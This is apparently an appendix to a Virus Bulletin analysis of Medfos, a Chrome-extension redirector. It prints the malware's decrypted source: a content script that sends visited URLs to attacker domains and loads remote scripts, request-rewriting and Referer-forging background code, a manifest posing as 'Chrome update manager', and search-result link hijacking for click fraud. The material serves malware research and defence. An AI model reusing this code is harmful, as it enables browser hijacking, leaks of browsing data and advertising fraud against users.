2014-01-06
Abstract
Appendix to Medfos - an all-purpose redirectot
Copyright © 2014 Virus Bulletin
Decrypted Manager.js
var p="84";
for(i=0;i<3;i++) {
var k1=Math.round(Math.random()*256);
p +='.'+k1;}
var k2=document.location.href;
var k3='';
if(k2.match("google.*\/(search|cse|webhp).*[&\?]q=") || k2.match("search\.yahoo.*search.*[&\?]p=") || k2.match("ask.com.*\/web.*
[&\?]q=") ||k2.match("bing.com\/search.*[&\?]q=") ||k2.match("aol\/search.*(query|q)=")) {
k3="search";
}
else if(k2.match("(yahoo|ask|aol|bing)\.[-\.\w]+\/?"+'$')) {
k3="empty";
}
else if (k2.match("(google)\.[-\.\w]+\/?"+'$') || k2.match("(google)\.[-\.\w]+\/#")) {
k3="live";
};
if(k3) {
var k4;
var kladsjnkf="gsu=NPF4j2BkyKinV/kP0euZstq3CY1wuSzf+M+itsf4K7ps4lJQPKIpuyV82gHLWTAMCjjaaRkSjrAWjqc9RwZBlo59KqYZU3od";
var LMALNJKfma="http://chrome-revision.com/feed";
var klamKNJFl="http://disable-instant-search.com/js/disable.js";
var ss;
if(k3=="live") ss=klamKNJFl;
else ss=LMALNJKfma;
var src=ss+"?type="+k3+"&user-agent=Mozilla%2F5.0+%28Windows+NT+5.1%29+AppleWebKit%2F534.30+%28KHTML%2C+like+Gecko%29+
Chrome%2F12.0.742.112+Safari%2F534.30&ip="+p+"&ref="+encodeURIComponent(k2)+'&'+kladsjnkf;
k4=document.createElement(script);
k4.src=src;
document.getElementsByTagName(head)[0].appendChild(k4);
Background.html
<script>
chrome.webRequest.onBeforeRequest.addListener(
function(o1)
{
var o2=o1.url.lastIndexOf("&clcrf=");
if( o2!=-1 )
{
var n3=o1.url.slice(o2+7);
var n4=o1.url.slice(0,o2);
localStorage[o1.requestId+"new_Ref"]=n3;
return {redirectUrl:n4};
}
},
{urls:["<all_urls>"]},["blocking"]
);
chrome.webRequest.onBeforeSendHeaders.addListener(
function(n5)
{
var n3=localStorage[n5.requestId+"new_Ref"];
if(n3)
{
n5.requestHeaders.push({name:"Referer",value:n3});
localStorage[n5.requestId+new_Ref]="";
return {requestHeaders:n5.requestHeaders};
}
},
{urls:["<all_urls>"]},["requestHeaders","blocking"]
);
</script>
Manifest.jason
"name": "ChromeUpdateManager",
"version": "1.0",
"manifest_version": 2,
"description": "Chrome update manager",
"background_page": "background.html",
"page_action" :
{
"default_icon" : "icon.png",
"default_title" : "ttl"
},
"content_scripts": [
{
"matches": ["http://*/*","https://*/*"],
"js": ["manager.js"]
}
],
"permissions" : [
"tabs", "http://*/", "https://*/", "history" , "webRequest", "webRequestBlocking", "\u003Call_urls\u003E"
],
"icons" : {
"48" : "icon.png",
"128" : "icon.png"
}
try {
var Links = document.getElementsByTagName('a');
var cs = 5;
for (var i = 0; i < Links.length; i++) {
if (Links[i].className == 'yschttl spt' && 0 < cs--) {
Links[i].removeAttribute('orighref');
Links[i].removeAttribute('dirtyhref');
var hr = Links[i].href;
if (hr.indexOf("&clcrf=") == -1) {
var l = encodeURIComponent(hr);
Links[i].href = "http://googleads.I.doubleclickchrome.com/url?sa=L&ai=1&bs=92cf&u=" + l + "&clcrf=
http://***LegitAdvertisementDomain***.com/search?query= SearchTerm ";
}
} else if (Links[i].href.indexOf('overture.com') != -1 || Links[i].href.indexOf('r.msn.com')) {
Links[i].href.search(/\*\*https?%3a\/\/([^\/]+)/);
var rds_dom = RegExp.$1;
if (rds_dom.indexOf('yahoo') == -1 && Links[i].href.indexOf('cache') == -1) {
Links[i].addEventListener('mousedown', function (e) {
if (this.href.indexOf("&clcrf=") == -1) {
var l = encodeURIComponent(this.href);
this.href = "http://googleads.I.doubleclickchrome.com/url?sa=L&ai=1&bs=92cf&ad=1&u=" + l + "&clcrf=
http://***LegitAdvertisementDomain***.com/search?query=SearchTerm";
}
}, true);
}
}
}
} catch (err) {}
-----------------------------------------------------------------------------------------------------------------------------
Where
SearchTerm is the search term enter by the user
***LegitAdvertisementDomain*** corresponds to domain of a legitimate advertisement website .
